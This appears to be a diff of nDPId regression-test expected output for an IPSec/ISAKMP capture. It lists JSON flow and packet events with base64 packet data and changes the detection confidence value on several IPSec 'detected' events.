{"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsy5UAAPcRCo5t7bvjwKgCZBGUOKQA2N2eAAAAAMT3roGUU5AxVDreTwHgKMguICMgAAAAAQAAAMwkAACw3+hDUjEFQ6MgpqAEcApKvn9uh3qVHzhAobzzdsLHNL0cE0MCy6hqRcHq2zyFYxqKUvV9qpSoUCOXzZX8acXWksJkwcZvlj3pHUnomqGBUy7YKx8\/BoUpsdZ+YJ66Urw6XFHoKHyVFJYrxhfDTA96A3GMtNoZk+CLmvMZh9uGXGXGb9zoZqBq9vHjZRx\/MplOtNEvpcXqGaCwVYcGtrGfedPqueJGKjXMXpyHhw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMqXpAAD8RpQnAqAJkbe274zikEZQAeOw1AAAAAMT3roGUU5AxVDreTwHgKMguICMIAAAAAgAAAGwwAABQp3zPqAaPZdCtSbotjrN0irXGcY7JpOGxC6pjgSY\/TZB8lMPX2DP1QKzYFMuSni2xVCT2eLDFep09w0XbtiWVOI2z82MP7LPt5iJg1A=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkUT5AAD8R+q7AqAJkbe274ikEAfQDENNXqwswX1pdWlQAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAANisWYZIjej7n3HtY6YrUGG6ju3JyAgfXaIbqQqsCk6WamsA3yJowbMrsQiavjlYliQ8\/bmnkd4oik6yfXzF2nnT5++MrBWp59hXjvpQG7CUKBYM2qK1rCYScGFGvoCH+VaOstA9qnbA93UZ+lGrf8oiyLKNCUx8EmTjNr1npSw0KQAAJEdv70J9iweqoyFFLnrl4Zzojnhs5HDATx3IKPlr2BaOKQAAHAAAQASxGcGDddgOxJ\/uFM4nQfEOTHdh1AAAABwAAEAFw3IlZSVVICry3JG3pa18XmliW9c="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQEZ0AAPcRxSNt7bviwKgCZAH0KQQAPGsMqwswX1pdWlQAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE1KWcIrU8y8ddQ+ocSmg=="} 01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8UUlAAD8R+ovAqAJkbe274ikEAfQDKAkLqwswX1pdWlQAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAE1KWcIrU8y8ddQ+ocSmiIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAANisWYZIjej7n3HtY6YrUGG6ju3JyAgfXaIbqQqsCk6WamsA3yJowbMrsQiavjlYliQ8\/bmnkd4oik6yfXzF2nnT5++MrBWp59hXjvpQG7CUKBYM2qK1rCYScGFGvoCH+VaOstA9qnbA93UZ+lGrf8oiyLKNCUx8EmTjNr1npSw0KQAAJEdv70J9iweqoyFFLnrl4Zzojnhs5HDATx3IKPlr2BaOKQAAHAAAQASxGcGDddgOxJ\/uFM4nQfEOTHdh1AAAABwAAEAFw3IlZSVVICry3JG3pa18XmliW9c="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMUU9AAD8R+nXAqAJkbe274jikEZQDODTyAAAAAKsLMF9aXVpU8rNpjARABmguICMIAAAAAQAAAywjAAMQ6Z9u6sp21FHw9VexxCL4jh1V4W3sanbv3b88odA16POyeoQKizKd2HmgH0NR\/U2FyiZQbxMqa7XMYFNMKV8428rCLY18jtse\/+ckrrjC9sewybMICEnJmMxbdEFF4AvTOGL3EKm3QT3Eg1HZ9ZSp\/t6tPSaAEKa3raNeV99MYev4bqmPqlmHO+GKwCUOmb\/\/WhuLPmluPOe2TBGJ66thL1vwc72vZmjJ35sjKPelra23UF5Cwj3EkN31PcPlnagyUKfFKe0tDEhi\/zcayi6IA3RQ45CcmYuYtppgdkgTrA4X8ySF2RNmlXfMSxeShomsWVIrcXowlFEptytcNtavQUOqRSsiRoCAesd4J0mAZlQJTHBJQkJF5D5oyy3uKyGkRMPJ4QqGe91skWMr4dklLDyu3k1\/Ki566+JgYKR97wLMp+O7E63S\/2oZe60EsKc1cNancp1xVIeK61Uxkni6d2O0j+NSXm8I+KbKCEsM8jktpVXjmOVnPHyuo9eeXJIhp8gexGSxUK1dF6Wb\/51j9mrJ6Rez4bGL2iuUAQ04aj0Ztuyp91rVSixxaUhqznAlebdvq7zw57FRYAGSwth67wRXsRtuptzlC92fMDUdQWF4\/q7Rg4ccMJF8RTqsCfv\/V5UkM4rN4lMhQLv9leCJg4L4VtlUhELb\/dmwApKHfm4qZ+AvwxRrhYksS4iWBYqPRAJpUwCdGnnGSqMBh3o6p6oq9yU+MJfyC7xA6IGAc5Da5Gt8ZyEcwo8JJWiwHu7dBeWjkvoyi6haT0hZBaq4CC5QTRFLa9S5ajUP40DdvqDMTYmfONTFGQA6d2YC17keI7odwHkGPKSlOt8w+jF8Dti71cbXyWEQJdY+ZVQdwHfTeUcrnxYVMpy7BP4dMcdpRdfc4lg\/QbRKOdKk0hT5LuCXF0M3Vp\/LEZa7FwCq638sPDKBcUlLhWwxQDFXGZJRnNhauA2AsjOr8gPCtSrE84a00K6Rme00o2hpitbodAaLdhM+MJrhzUFjCUrk+AIvDAWX+uOvXRH6A7qL"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsEjkAAPcRw+tt7bviwKgCZBGUOKQA2NOBAAAAAKsLMF9aXVpU8rNpjARABmguICMgAAAAAQAAAMwkAACwlJd8WVcVfeBQmkN5fuj2YUx6tDxIVbQvy2JQRd\/BtL4hXpKJzs\/swh9hLZeQKsbMp\/sy\/av\/bbUA1jEWVrhNWIPQTh6mM4lKY0bMGYNJnwKWMpvDypsZQVORgQLb\/inT5fJkB85cKyuZ+OpfJNkxWxJ8xlgnHQZNmWhknOe41lnZLuRVg3w85pw0ONcgDXn5tgFkGuxKxNyj8Xr3SY\/nJqVuAzK+TYqBB8TmXQ=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMUeNAAD8R\/KHAqAJkbe274jikEZQAeP5qAAAAAKsLMF9aXVpU8rNpjARABmguICMIAAAAAgAAAGwwAABQ0MVvdAw+LEqFA+nmF6i+XI58eiVp1GRV\/rWe4MnVHMpW8WwgWN8kiN6DP4sWq+W6GDQg7Lq8MyuzO0xwSZTAHDjDg8bbx5JyeewH2w=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkfBRAAD8R0DjAqAJkbe27gikEAfQDEGb1zXuuLUv9pz4AAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAALekGQeyXWU\/60toX74oI0NOPrQEorT913B5RWuu2HN1uo6YOszdlN6tok1qsbs6hmVmZJrWGXgOe3sFZUtEGtWNQ8t7Aa2Mt0TQHl9URPDFrZpMIDNYSLz2uksGoJV4Y6wEfAxTeZYeEH8X4gcBz7P\/QA6cRN0\/JVa9p1v0\/57HKQAAJDvJ2clyg7FCIyXAj1uqYyldr2SIGMxOXOwB1SVwhMTkKQAAHAAAQATF2N6DrOv0hzfW361l0T7OSbO+kwAAABwAAEAFMV3HOKq0Fujlh4APMbK5f7RIWno="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQkyoAAPYRRPZt7buCwKgCZAH0KQQAPF4QzXuuLUv9pz4AAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAABq0Q7n6QjJnJsuTER7qA=="} 01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8fBlAAD8R0BvAqAJkbe27gikEAfQDKG4VzXuuLUv9pz4AAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAABq0Q7n6QjJnJsuTER7qCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAALekGQeyXWU\/60toX74oI0NOPrQEorT913B5RWuu2HN1uo6YOszdlN6tok1qsbs6hmVmZJrWGXgOe3sFZUtEGtWNQ8t7Aa2Mt0TQHl9URPDFrZpMIDNYSLz2uksGoJV4Y6wEfAxTeZYeEH8X4gcBz7P\/QA6cRN0\/JVa9p1v0\/57HKQAAJDvJ2clyg7FCIyXAj1uqYyldr2SIGMxOXOwB1SVwhMTkKQAAHAAAQATF2N6DrOv0hzfW361l0T7OSbO+kwAAABwAAEAFMV3HOKq0Fujlh4APMbK5f7RIWno="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMfCFAAD8R0APAqAJkbe27gjikEZQDOCAiAAAAAM17ri1L\/ac+HEFGvwEgEbUuICMIAAAAAQAAAywjAAMQ469lGmPc0hEi4\/rpKiGNJD5Nq3zlOv1Ml0GnlFKZ1XFdIX2l2YH07yFoJhfYZ2uPmk\/EvBYB5IwL1MpwJsetr2cZ8C2kW68lmBiPVHDkzVz1FpqFwUeXxsTO\/Mne10x8MSBJZeDYyhjRenBg3qSQ1uh4sNnAjwGFkmEcoZY67hDaUrE6wNAw9EmuFPveCUXZ3pwm+gN1qANqoDeOuU+OiOaHkRLZm4QshDsPQjnKVG+6dJ+FCJmeIjP+zfNtwm0D9ZIK1sH7KgHGb\/8OnIRTLElll85J5T9YxF\/tXUFiIdklrebmdtfN++jPvpIp5BroJhVNhCZx9TbCKAFIqpkZjSTypUKXVA4HW7iOuOQrFR3wlNQXJqjxT115EzTgAdQoemZr4vifC\/9RIxTB46YkugRBKYxip\/BhFbmOLAfuuRU8q1HCwxb5QcTPdno6A7IcuG50\/ldiPpMbFCHNogwzNfD1Rm4LuR5g4O7LzbiB0HgfSGDpQQ1sccieUvGtWwS5yJJdcWhQsSn7aQGNkfN+NUSUJ6z3Uoix6ULjG3ES7H\/3x+Drxi7D+3CxKOij6nCVqh+v89ZPL8\/TlaeEofmgfO4Nqb4uT1s3AsTLAeEUuFmlcmIULbCyw0RXNDSB+BPNYmAi7IiuA6q+gmBXqR4a+RtHymCDcYLEHwDW0cHx5vpFt2YeIu261FNKYH0qcFZ5DpoHNL109VmvYUglfOOgGnETPAP+ueLV4Jt31JG0U7yGwUsfYEfW9Nw1KEhI\/HAzn9q0\/y0eNexl9abCbKpbCwVRqP1jZb0g\/BvxC5rt6knjqRXDXiOiAHZwdEPRAi815hn8JfgceuT4I5RXaQ1slfVaPhlrteTbnEq9UmEuoG6O9s\/QMqHx0huvA7savNo2cZnm+Jkm3qpMJxuZUDI9jP775IRGH2Q5LYdBdhjjwE6BJodj\/v8xocqeSrw5TgLnTred0263arnrnaKLSz6c91YGE3+E1R\/TbdN5fgCta0W+jhywiGo1m7Mmt2cdZwGYfhtyqsp5broKOCsH"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsk6IAAPYRQ+Jt7buCwKgCZBGUOKQA2IekAAAAAM17ri1L\/ac+HEFGvwEgEbUuICMgAAAAAQAAAMwkAACwnjHnEXtSQ9YBTsYWhNWWL2lb3zCSVGmtTzEvh47BEs\/bjLyBXTJjuCqg7wWeV74OlRvZj2lbuv2HF8N25vmjxy2gOj3GTSIkrJ81O5xBYrk\/DO\/U3vnDhNrRnxnnbUAcri8CK4colHYFHy00rAAnAiq\/J3y\/4Psn7O2YNdeQxTN+FVKTTs+PkcU9iJQYjyeso5yATeFNdg3Yo2REPpR\/v53srr2DXIiU+rV2BA=="} 